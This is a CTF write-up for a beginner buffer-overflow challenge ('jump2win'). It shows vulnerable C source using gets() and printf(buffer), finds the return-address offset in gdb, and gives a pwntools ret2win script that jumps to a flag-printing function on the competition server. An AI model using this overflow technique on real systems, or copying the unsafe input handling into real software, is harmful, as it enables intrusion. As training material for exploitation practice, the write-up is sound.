AUCHALL - [Pwn] - jump2win

You,AUCHALLPwn
Back

Challenge Description

A leap of faith.

Solution

First thing we would check is binary protections

Alt text

Only NX is enabled which means that we cannot execute our shellcode

PIE is disabled

On checking source code I found out that there is use of gets() function so we can do buffer overflow

Source Code

#include <stdio.h>
#include <stdlib.h>

void call_my_function(void) {
    FILE *file;
    char line[100];
    file = fopen("/flag", "r");
    if (file == NULL) {
        puts("[FAIL] Contact an admin.\n");
        exit(1);
    }
    while (fgets(line, sizeof(line), file) != NULL) {
        puts(line);
    }
    fclose(file);
}

void vuln() {
    int allowed = 0;
    char buffer[50];
    printf("Hello, my name is Ali, what is yours? ");
    gets(buffer);
    printf(buffer); // :)
}

int main() {
    setbuf(stdin, NULL);
	setbuf(stdout, NULL);
	setbuf(stderr, NULL);
    vuln();
}

Offset

For offset we would run it in gdb

Alt text

So we have found offset is 66

Solution

I made a simple pwntools script to get this working

from pwn import *
 
elf = ELF('./jmp')
 
io = process('./jmp')
io = remote('section-b.cy243l.ooguy.com', PORT)
 
print(io.recv())
 
payload = cyclic(66) + p32(elf.sym.call_my_function)
io.sendline(payload)
print(io.recv())
io.interactive()

Alt text

Flag

Flag is dynamic

CY243L{ret2wins_are_easy_no_0F01Cd9_X6V8_1MZx}

Writeups 2023 © RootxRAN.